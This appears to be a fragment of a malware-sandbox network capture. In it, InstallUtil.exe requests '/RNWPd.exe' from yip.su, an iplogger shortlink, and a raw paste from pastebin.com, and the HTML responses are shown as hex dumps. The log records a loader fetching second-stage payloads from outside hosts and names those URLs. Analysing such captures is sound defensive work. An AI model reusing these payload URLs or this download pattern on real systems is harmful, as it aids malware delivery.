                                                2024-08-09 21:01:59 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:02:00 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:02:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.649748188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:00 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:00 UTC906INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:00 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:00 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRfKNAQ99h4%2BCUK0DERFE21P6JYwwFurp%2BK0S%2F%2FbP5BJ%2BUZ9P3JzwcFUY8aM3VsYe%2F4L8fdrD6IsQ3BYY2oCkgZ7QLIutyT3sTpv3hDBcL7vWbXoVivGSw0%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf466f7817bd-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:00 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:00 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                                                Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                                                2024-08-09 21:02:00 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                                                Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                                                2024-08-09 21:02:00 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                                                Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                                                2024-08-09 21:02:00 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                                                Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                                                2024-08-09 21:02:00 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                                                Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                                                2024-08-09 21:02:00 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.649749172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:05 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:05 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf65bc956a5f-EWR
                                                2024-08-09 21:02:05 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:02:05 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:02:05 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:02:05 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:02:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.649750188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:06 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:06 UTC900INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:06 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pXHicwiN%2F8oidIFpGuFxOfAafUSRp2nqvFj4OjfU9wUbAh%2B27LXxxk9MeR0g08nX3D97lL47L29fMgtqEikDKHKcpUC90A%2BCuRc6eHPgVjzG8ZkUzGPJrFk%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf69de014313-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:06 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:06 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                                                Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                                                2024-08-09 21:02:06 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                                                Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                                                2024-08-09 21:02:06 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                                                Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
